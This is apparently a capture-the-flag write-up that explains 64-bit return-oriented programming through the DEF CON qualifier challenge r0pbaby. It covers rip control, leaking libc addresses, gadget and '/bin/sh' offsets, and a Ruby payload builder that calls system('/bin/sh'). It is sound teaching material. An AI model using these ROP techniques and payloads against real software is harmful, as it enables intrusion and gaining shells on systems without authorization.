Defcon Quals: r0pbaby (simple 64-bit ROP)

Unfortunately, I got stuck for quite a long time on a 2-point problem ("wwtw") and spent most of my weekend on it. But I did do a few others - r0pbaby included - and am excited to write about them, as well!

r0pbaby is neat, because it's an absolute bare-bones ROP (return-oriented programming) level. Quite honestly, when it makes sense, I actually prefer using a ROP chain to using shellcode. Much of the time, it's easier! You can see the binary, my solution, and other stuff I used on this GitHub repo.

It might make sense to read a post I made in 2013 about a level in PlaidCTF called ropasaurusrex. But it's not really necessary - I'm going to explain the same stuff again with two years more experience!

What is ROP?

Most modern systems have DEP - data execution prevention - enabled. That means that when trying to run arbitrary code, the code has to be in memory that's executable. Typically, when a process is running, all memory segments are either writable (+w) or executable (+x) - not both. That's sometimes called "W^X", but it seems more appropriate to just call it common sense.

ROP - return-oriented programming - is an exploitation technique that bypasses DEP. It does that by chaining together legitimate code that's already in executable memory. This requires the attacker to either a) have complete control of the stack, or b) have control of rip/eip (the instruction pointer register) and the ability to change esp/rsp (the stack pointer) to point to another buffer.

As a quick example, let's say you overwrite the return address of a vulnerable function with the address of libc's sleep() function. When the vulnerable function attempts to return, instead of returning to where it's supposed to (or returning to shellcode), it'll return to the first line of sleep().

On a 32-bit system, sleep() will look at the stack for its argument: it skips the value right after the overwritten return address (that's the address sleep() itself will return to) and reads the one after that. On a 64-bit system, it'll look at the value of the rdi register for its argument, which is a little more elaborate to set up. When it's done, it'll return to the next value on the stack on both architectures, which could very well be another function.
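Here's a minimal Ruby sketch of the 32-bit layout just described, i.e. the words that would overwrite the saved return address and what follows it. The addresses are made-up placeholders, not values from r0pbaby, and it assumes the usual cdecl convention where sleep() finds its argument at [esp+4] when it starts running.

```ruby
# Hypothetical 32-bit addresses, for illustration only.
SLEEP_ADDR  = 0x08048400 # the overwritten return address sends us here
NEXT_RETURN = 0x08048500 # where sleep() itself will "return" to when it's done
SECONDS     = 1000       # sleep()'s argument

# Build the words that overwrite the saved return address and what follows it.
# When sleep() starts running, [esp] is its return address and [esp+4] is its
# first argument, so the argument sits two slots past the overwritten address.
def ret2sleep_32(sleep_addr, next_return, seconds)
  [sleep_addr, next_return, seconds].pack("V3") # "V" = 32-bit little-endian
end

chain = ret2sleep_32(SLEEP_ADDR, NEXT_RETURN, SECONDS)
chain.unpack("V3").each_with_index do |word, i|
  puts format("slot %d: 0x%08x", i, word)
end
```

The 64-bit version can't be built this way, since the argument has to end up in rdi rather than on the stack.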

We'll look at option 3 more in a little while, but for now let's take a quick look at options 1 and 2. The rest of this section isn't directly applicable to the exploitation stuff, so you're free to skip it if you want. :)

If you look at the results from option 1 and option 2, you'll see one strange thing: the return from "Get libc address" is higher than the addresses of printf() and system(). It also isn't page aligned (a multiple of 0x1000 (4096), usually), so it almost certainly isn't actually the base address (which, in fairness, the level doesn't explicitly say it is).

I messed around a bit out of curiosity. Here's what I discovered...

First, run the program in gdb and get the address that they claim is libc:

From experience, that looks like a 64-bit address to me (6 bytes long, with 0x7f as the most significant byte, which is typical for shared libraries on 64-bit Linux), so I tried examining the 64-bit value stored at that address:

(gdb) x/xg 0x00007FFFF7FF8B28
0x7ffff7ff8b28: 0x00007ffff7842000

Aha! It's a pointer to the actual base address! It seems a little odd to send that to the user, since it does them basically no good, so I'll assume that it's a bug. :)
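The page-alignment argument is easy to check mechanically. Here's a minimal Ruby sketch, assuming the usual 4096-byte page size and using the two values from the gdb session above:

```ruby
PAGE_SIZE = 0x1000 # 4096, the usual x86-64 page size

# A shared library is mapped starting on a page boundary, so a real base
# address has its low 12 bits clear.
def page_aligned?(addr)
  (addr % PAGE_SIZE).zero?
end

leaked     = 0x00007FFFF7FF8B28 # what option 1 printed
pointed_to = 0x00007ffff7842000 # what gdb found stored at that address

puts page_aligned?(leaked)     # => false
puts page_aligned?(pointed_to) # => true
```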

Stealing libc

If there's one thing I hate, it's attacking a level blind. Based on the output so far, it's pretty clear that they're going to want us to call a libc function, but they don't actually give us a copy of libc.so! While it's not strictly necessary, having a copy of libc.so makes this far easier.

I'll post more details about how and why to steal libc in a future post, but for now, suffice it to say: if you can, beat the easiest 64-bit level first (like babycmd) and liberate a copy of libc.so. Also snag a 32-bit version of libc if you can find one. Believe me, you'll be thankful for it later! To make it possible to follow the rest of this post, here's libc-2.19.so from babycmd and here's libc-2.20.so from my box, which is the one I'll use for this writeup.

You might be wondering how to verify whether or not that actually IS the right library. For now, let's consider that to be homework. I'll be writing more about that in the future, I promise!

Find a crash

I played around with option 3 for a while, but it kept giving me a length error. So I used the best approach for annoying CTF problems: I asked a teammate who'd already solved that problem. He'd reverse engineered the function already, saving me the trouble. :)

It turns out that the correct way to format things is by sending a length, then a newline, then the payload:
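As a minimal Ruby sketch of that framing: it assumes the length is sent as a decimal number of bytes, `frame_r0p_input` is a hypothetical helper name, and it leaves out the menu selection that comes before it.

```ruby
# Hypothetical helper: frame a payload the way option 3 expects it, i.e. the
# length (assumed to be decimal text), a newline, then the raw bytes.
def frame_r0p_input(payload)
  bytes = payload.b               # treat the payload as raw binary
  "#{bytes.bytesize}\n".b + bytes # length line first, then the payload
end

framed = frame_r0p_input("AAAAAAAABBBBBBBB")
p framed # => "16\nAAAAAAAABBBBBBBB"
```

Counting with `bytesize` rather than `length` matters once the payload contains packed addresses, since those are raw bytes, not characters.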

Well, that may be one of the easiest ways I've gotten a segfault! But the work isn't quite done. :)

rip control

Our first goal is going to be to get control of rip (that's like eip, the instruction pointer, but on a 64-bit system). As you probably know by now, rip is the register that points to the current instruction being executed. If we move it, different code runs. The classic attack is to move eip to point at shellcode, but ROP is different. We want to carefully control rip to make sure it winds up in all the right places.

But first, let's non-carefully control it!

The program indicates that it's writing the r0p buffer to the stack, so the easiest thing to do is probably to start throwing stuff into the buffer to see what happens. I like to send a string with a series of values I'll recognize in a debugger. Since it's a 64-bit app, I send 8 "A"s, 8 "B"s, and so on. If it doesn't crash, I send more.
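Typing that string by hand gets old fast. Here's a Ruby sketch (the helper names are mine, not from any tool) that builds the 8-bytes-per-letter pattern and maps a value seen in a register after the crash back to its offset in the buffer. With one letter per word, it tops out at 26 words (208 bytes).

```ruby
# Build a recognizable pattern: 8 "A"s, 8 "B"s, 8 "C"s, ... one 64-bit word per letter.
def word_pattern(words)
  ("A".."Z").first(words).map { |ch| ch * 8 }.join
end

# Given a 64-bit register value from the crash, find where in the pattern it came from.
def pattern_offset(value, words = 26)
  needle = [value].pack("Q<") # registers hold values; memory holds little-endian bytes
  word_pattern(words).index(needle)
end

puts word_pattern(4)                    # AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD
puts pattern_offset(0x4242424242424242) # 8
```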

All right, it crashes at 0x0000555555554eb3. Let's take a look at what lives at the current instruction (pro-tip: "x/i $rip" or equivalent is basically always the first thing I run on any crash I'm investigating):

(gdb) x/i $rip
=> 0x555555554eb3: ret

It's crashing while attempting to return! That generally only happens when either the stack pointer is messed up...

(gdb) print/x $rsp
$1 = 0x7fffffffd918

...which it doesn't appear to be, or when it's trying to return to a bad address...

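On x86-64, a value like 0x4242424242424242 isn't even a valid (canonical) address, since bits 48 through 63 have to be copies of bit 47, so the CPU faults on the ret itself instead of jumping there. We can confirm this, and also prove to ourselves that NUL bytes are allowed in the input, by sending a couple of NUL bytes. I'm switching to using 'echo' on the command line now, so I can easily add NUL bytes (keep in mind that because of little endian, the NUL bytes have to go after the "B"s, not before):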

Now we can see that rip was successfully set to 0x0000424242424242 ("BBBBBB\0\0" because of little endian)!
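Here's a quick Ruby sketch of both points: how the little-endian bytes "BBBBBB\0\0" read back as 0x0000424242424242, and why that value can land in rip when 0x4242424242424242 can't. The `canonical?` helper is my own illustration of the x86-64 rule (assuming 48-bit virtual addresses), not something from the level.

```ruby
# "BBBBBB\0\0" as it sits in memory, read back as a little-endian 64-bit value.
value = "BBBBBB\0\0".unpack1("Q<")
puts format("0x%016x", value) # 0x0000424242424242

# x86-64 only accepts "canonical" addresses: bits 63..48 must all equal bit 47.
# Returning to a non-canonical address faults on the ret instruction itself.
def canonical?(addr)
  top = addr >> 47 # bits 63..47 (17 bits)
  top.zero? || top == 0x1ffff
end

puts canonical?(0x4242424242424242) # false: crashes at the ret
puts canonical?(0x0000424242424242) # true: rip actually gets set
```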

How's the stack work again?

As I said at the start, reading my post about ropasaurusrex would be a good way to get acquainted with ROP exploits. If you're pretty comfortable with stacks or you've recently read/understood that post, feel free to skip this section!

Let's start by talking about 32-bit systems - where parameters are passed on the stack instead of in registers. I'll explain how to deal with register parameters in 64-bit below.

Okay, so: a program's stack is a run-time structure that holds temporary values that functions need: things like the parameters, the local variables, the return address, and other stuff. When a function is called, it allocates itself some space on the stack by growing downward (towards lower memory addresses). When the function returns, the data's all removed from the stack (it's not actually wiped from memory; it just becomes free to get overwritten). The stack pointer register (rsp, or esp on 32-bit) always points to the most recent thing pushed to the stack, which is also the next thing that would be popped off the stack.

Let's use sleep() as an example again. You call sleep() like this:

1: push 1000
2: call sleep

or like this:

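1: mov dword [esp], 1000
2: call sleep

They're identical, as far as sleep() is concerned. The mov version assumes the caller has already reserved that stack slot, but either way the argument winds up at the top of the stack when call runs. The first is a tiny bit more memory efficient and the second is a tiny bit faster, but that's about it.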

Before line 1, we don't know or care what's on the stack. We can look at it like this (I'm choosing completely arbitrary addresses so you can match up diagrams with each other):

Values lower than rsp are unused. That means that as far as the stack's concerned, they're unallocated. They might be zero, or they might contain values from previous function calls. In a properly working system, they're never read. If they're accidentally used (like if somebody declares a variable but forgets to initialize it), you could wind up with an uninitialized-memory vulnerability, a close cousin of use-after-free.

The value that rsp is pointing to and the values above it (at higher addresses) also don't really matter. They're part of the stack frame for the function that's calling sleep(), and sleep() doesn't care about those. It only cares about its own stack frame (a stack frame, as we'll see, is the parameters, return address, saved registers, and local variables of a function - basically, everything the function stores on the stack and everything it cares about on the stack).

Line 1 pushes 1000 onto the stack. The frame will then look like this:

And that's the entire stack frame for the sleep() function call! It's possible that there are other registers preserved on the stack, in addition to rbp, but that doesn't really change anything. We only care about the parameters and the return address.

And so on, with the stack constantly growing towards lower addresses. When the function returns, the same thing happens in reverse order (the local vars are removed from the stack by adding to rsp (or replacing it with rbp), rbp is popped off the stack, and the return address is popped and returned to).
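If the push/call/ret dance is easier to follow as code, here's a toy Ruby model of a 32-bit stack. It's purely illustrative: the starting esp and the return address pushed by call are arbitrary, and it ignores the saved ebp and local variables.

```ruby
# Toy model of a 32-bit stack: memory is a hash from address to a 4-byte
# value, and esp points at the most recently pushed value.
class ToyStack
  attr_reader :esp

  def initialize(esp)
    @esp = esp
    @mem = {}
  end

  # push: grow downward (towards lower addresses), then store the value.
  def push(value)
    @esp -= 4
    @mem[@esp] = value
  end

  # pop: read the value, then shrink the stack. The old value isn't wiped;
  # it just becomes free to get overwritten.
  def pop
    value = @mem[@esp]
    @esp += 4
    value
  end

  def read(addr)
    @mem[addr]
  end
end

stack = ToyStack.new(0xbfff0100) # arbitrary starting esp
stack.push(1000)                 # 1: push 1000
stack.push(0x08048123)           # 2: call sleep (pushes a made-up return address)

# On entry to sleep(): [esp] is the return address, [esp+4] is the argument.
puts format("0x%08x", stack.read(stack.esp)) # 0x08048123
puts stack.read(stack.esp + 4)               # 1000

ret_addr = stack.pop # ret: pop the return address and jump to it
# esp now points at the 1000 again; with cdecl, the caller removes it.
```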

The parameters are cleared off the stack by either the caller or the callee, depending on the calling convention, but that won't come into play for this writeup. However, when ROP is used to call multiple functions, unless the functions clean up their own parameters, the exploit developer has to do it themselves. Typically, on Windows, functions clean up after themselves, but on other OSes they don't (and you can't rely on it either way). The cleanup is done by returning into a "pop ret", "pop pop ret", etc., gadget after each function call. See my ropasaurusrex writeup for more details.
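Here's a minimal Ruby sketch of that cleanup idea: a 32-bit chain that calls one function with two arguments and then another with one. Every address in it is a hypothetical placeholder; in a real exploit the functions and the "pop pop ret"/"pop ret" gadgets would come from the binary or libc, and it assumes that neither function removes its own arguments.

```ruby
# Hypothetical 32-bit addresses; in a real exploit these come from the binary/libc.
FUNC1       = 0x08048410 # some function taking two arguments
FUNC2       = 0x08048420 # some function taking one argument
POP_POP_RET = 0x08048601 # pop reg; pop reg; ret
POP_RET     = 0x08048602 # pop reg; ret
DONE        = 0x41414141 # where the chain finally returns (don't care)

# func1(1, 2), then func2(3). Each function "returns" into a gadget that pops
# its arguments off the stack, then rets into the next link of the chain.
def chain_32
  [
    FUNC1, POP_POP_RET, 1, 2, # call func1, then discard its two args
    FUNC2, POP_RET, 3,        # call func2, then discard its one arg
    DONE
  ].pack("V*")
end

puts chain_32.unpack("V*").map { |w| format("0x%08x", w) }
```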

Enter: 64-bit

The fact that this level is 64-bit complicates things in important ways (and ways that I always seem to forget about till things don't work).

Specifically, in 64-bit, the first handful of parameters to a function are passed in registers, not on the stack. I don't have the order of registers memorized - I forget it after every CTF, along with whether ja/jb or jl/jg are the unsigned ones - but the first two are rdi and rsi. That means that to call the same sleep() function on 64-bit, we'd have this code instead:

No parameters, just the return address, saved frame pointer, and local variables. On 64-bit, the stack only gets used for parameters once a function has more of them than there are argument registers, which is rare.
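Since I always forget the register order, here's a small Ruby sketch of the rule for Linux (the System V AMD64 calling convention). It only covers integer and pointer arguments (floating-point ones go in xmm registers instead), and Windows uses a different convention entirely.

```ruby
# Linux x86-64 (System V AMD64 ABI): the first six integer/pointer arguments
# go in these registers, in this order.
ARG_REGISTERS = %w[rdi rsi rdx rcx r8 r9].freeze

# Where does argument number n (1-based) live when a function starts running?
# Beyond the sixth, arguments go on the stack; at function entry, [rsp] is
# the return address, so argument 7 is at [rsp+8], argument 8 at [rsp+16], ...
def arg_location(n)
  raise ArgumentError, "arguments are 1-based" if n < 1
  return ARG_REGISTERS[n - 1] if n <= 6

  "[rsp+#{8 * (n - 6)}]"
end

(1..8).each { |n| puts "arg #{n}: #{arg_location(n)}" }
```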

Stacks: the important bit

Okay, so that's a stack frame. A stack frame contains parameters, return address, saved registers, and local variables. On 64-bit, it usually contains the return address, saved registers, and local variables (no parameters).

But here's the thing: when you enter a function - that is to say, when you start running the first line of the function - the function doesn't really know where you came from. I mean, not really. It knows the return address that's on the stack, but doesn't really have a way to validate that it's real (except with advanced exploitation mitigations). It also knows that there are some parameters right before (at higher addresses than) the return address, if it's 32-bit. Or that rdi/rsi/etc. contain parameters if it's 64-bit.

So let's say you overwrote the return address on the stack and returned to the first line of sleep(). What's it going to do?

As we saw, on 64-bit, sleep() expects its stack frame to contain a return address:

sleep() will push some registers, make room for local variables, and really just do its own thing. When it's all done, it'll grab the return address from the stack and return to it, and somebody will move rsp back to the calling function's stack frame (i.e., get rid of any parameters on the stack).

Using system()

Because this level uses stdout and stdin for i/o, all we really have to do is make this call:

system("/bin/sh")

Then we can run arbitrary commands. Seems pretty simple, eh? We don't even care where system() returns to; once it's done, the program can just crash!

You just have to do two things:

set rip to the address of system()

set rdi to a pointer to the string "/bin/sh" (or just "sh" if you prefer)

Setting rip to the address of system() is easy. We have the address of system() and we have rip control, as we discovered. It's just a matter of grabbing the address of system() and using that in the overflow.

Setting rdi to the pointer to "/bin/sh" is a little more problematic, though. First, we need to find the address of "/bin/sh" somehow. Then we need a "gadget" to put it in rdi. A "gadget", in ROP, refers to a small piece of code that performs an operation then returns.

It turns out, all of the above can be easily done by using a copy of libc.so. Remember how I told you it'd come in handy?

Finding "/bin/sh"

So, this is actually pretty easy. We need to find "/bin/sh" given a) the ability to leak an address in libc.so (which this program does by design), and b) a copy of libc.so. Even with ASLR turned on, any two addresses within the same binary (like within libc.so or within the binary itself) won't change their relative positions to each other. The distance between addresses in two different binaries (say, one in libc.so and one in the program itself) will likely change from run to run, though.

If you fire up IDA and go to the "strings" tab (shift-F12), you can search for "/bin/sh". You'll see that "/bin/sh" will have an address something like 0x7ffff6aa307c.

Alternatively, you can use this gdb command (helpfully supplied by bla from io.sts):

Once you've obtained the address of "/bin/sh", find the address of any libc function - we'll use system(), since system() will come in handy later. The address will be something like 0x00007ffff6983960. If you subtract the two addresses, you'll discover that the address of "/bin/sh" is 0x11f71c bytes after the address of system(). As I said earlier, that won't change, so we can reliably use that in our exploit.
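Here's that subtraction as a Ruby sketch, using the example addresses above. Keep in mind that 0x11f71c is specific to my copy of libc-2.20.so; a different libc build will give a different offset.

```ruby
# Example values from the text: system() and "/bin/sh" in one run of the program.
SYSTEM_ADDR = 0x00007ffff6983960
BIN_SH_ADDR = 0x00007ffff6aa307c

# The distance between two things in the same library never changes...
BIN_SH_OFFSET = BIN_SH_ADDR - SYSTEM_ADDR
puts format("0x%x", BIN_SH_OFFSET) # 0x11f71c

# ...so once system() has been leaked in a new (ASLR-randomized) run,
# "/bin/sh" is at a fixed distance from it.
def bin_sh_from(system_addr)
  system_addr + BIN_SH_OFFSET
end
```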

What a beautiful sequence! It pops the next value off the stack into rax, pops the next value into rdi, and calls rax. So it calls an address from the stack with a parameter read from the stack. It's such a lovely gadget! I was surprised and excited to find it, though I'm sure every other CTF team already knew about it. :)

The absolute address that IDA gives us is 0x00007ffff80e1df1, but just like the "/bin/sh" string, the address relative to the rest of the binary never changes. If you subtract the address of system() from that address, you'll get 0xa7969 (on my copy of libc).

Let's look at an example of what's actually going on when we call that gadget. You're at the end of main() and getting ready to return. rsp is pointing to what main() thinks is its return address, but is really the slot that held "BBBBBBBB" and now holds gadget_addr:

The first instruction - pop rax - runs. rax is now 0x4343434343434343 ("CCCCCCCC").

The second instruction - pop rdi - runs. rdi is now 0x4444444444444444 ("DDDDDDDD").

Then the final instruction - call rax - runs. It'll attempt to call 0x4343434343434343, with 0x4444444444444444 as its parameter, and crash. Controlling both the called address and the parameter is a huge win!
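To make the walkthrough concrete, here's a toy Ruby simulation of the gadget. It treats the stack as an array of 64-bit words starting wherever rsp points when the gadget begins (just past the gadget's own address, which ret already consumed), and it ignores the return address that call pushes.

```ruby
# Simulate "pop rax; pop rdi; call rax" against a list of 64-bit stack words,
# where stack[0] is what rsp points to when the gadget starts running.
def run_gadget(stack)
  rsp = 0
  rax = stack[rsp] # pop rax
  rsp += 1
  rdi = stack[rsp] # pop rdi
  rsp += 1
  # call rax: jump to rax, and the callee reads its first argument from rdi.
  { call_target: rax, first_arg: rdi, remaining: stack.drop(rsp) }
end

words = "CCCCCCCCDDDDDDDD".unpack("Q<*")
result = run_gadget(words)
puts format("call 0x%016x(0x%016x)", result[:call_target], result[:first_arg])
# call 0x4343434343434343(0x4444444444444444)
```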

Putting it all together

I realize this is a lot to take in if you can't read stacks backwards and forwards (trust me, I frequently read stacks backwards - in fact, I wrote this entire blog post with upside-down stacks before I noticed and had to go back and fix it! :) ).

Here's what we have:

The ability to write up to 1024 bytes onto the stack

The ability to get the address of system()

The ability to get the address of "/bin/sh", based on the address of system()

The ability to get the address of a sexy gadget, also based on system(), that'll call something from the stack with a parameter from the stack

We're overflowing a local variable in main(). Immediately before our overflow, this is what main()'s stack frame probably looks like:

Because you only get 8 bytes before you hit the return address, the first 8 bytes are probably overwriting the saved frame pointer. (Or whatever; it doesn't really matter. But you can prove it's the frame pointer by using a debugger and verifying that rbp is 0x4141414141414141 after main() returns. It is.)

The main thing is, as we saw earlier, if you send the string "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD", the "BBBBBBBB" winds up as main()'s return address. That means the stack winds up looking like this before main() starts cleaning up its stack frame:

It's trying to call "CCCCCCCC" with the parameter "DDDDDDDD". Awesome! Let's try it again, but this time we'll plug in our sh_address in place of "DDDDDDDD" to make sure that's working (I strongly believe in incremental testing :) ):

Unfortunately, you can't return into system(). I couldn't figure out why, but on Twitter Jan Kadijk said that it's likely because system() ends when it sees the end of file (EOF) marker, which makes perfect sense.

So in the interest of proving that this actually returns to a function, we'll call printf (0x00007FFFF7892F10) instead:

It prints out its first parameter - "/bin/sh" - proving that printf() was called and therefore the return chain works!

The exploit

Here's the full exploit in Ruby. If you want to run this against your own system, you'll have to calculate the offset of the "/bin/sh" string and the handy-dandy gadget first! Just find them in IDA or objdump or whatever and subtract the address of system() from them.
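As a sketch of the core of the exploit (not the full exploit itself), here's Ruby that parses a leaked address and builds the 32-byte payload. The offsets are the ones from my libc-2.20.so, `parse_address` and `build_payload` are hypothetical helper names, and since the exact text option 2 prints isn't reproduced here, the parser just grabs the first 0x... token.

```ruby
# Offsets from system() in the author's libc-2.20.so (recompute for your copy).
BIN_SH_OFFSET = 0x11f71c # "/bin/sh" string
GADGET_OFFSET = 0xa7969  # pop rax; pop rdi; call rax

# Pull the first hex address out of a line of program output.
def parse_address(line)
  match = line.match(/0x\h+/) or raise ArgumentError, "no address in #{line.inspect}"
  match[0].hex
end

# Stack layout overwritten by option 3:
#   8 bytes -> saved rbp (junk)
#   8 bytes -> main()'s return address = gadget
#   8 bytes -> popped into rax = system()
#   8 bytes -> popped into rdi = pointer to "/bin/sh"
def build_payload(system_addr)
  gadget = system_addr + GADGET_OFFSET
  bin_sh = system_addr + BIN_SH_OFFSET
  ("A" * 8).b + [gadget, system_addr, bin_sh].pack("Q<3")
end

# Hypothetical output line, reusing the example system() address from above.
system_addr = parse_address("system: 0x00007ffff6983960")
payload = build_payload(system_addr)
puts payload.bytesize # 32
```

The payload would then go to option 3 as its length, a newline, and the bytes themselves.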

[update] Or... do it the easy way

After I posted this, I got a tweet from @gaasedelen informing me that libc has a "magic" address that will literally call exec() with "/bin/sh", making much of this unnecessary for this particular level. You can find it by seeing where the "/bin/sh" string is referenced. You can return to that address and a shell pops.

But it's still a good idea to know how to construct a ROP chain, even if it's not strictly necessary. :)

Conclusion

And that's how to perform a ROP attack against a 64-bit binary! I'd love to hear feedback!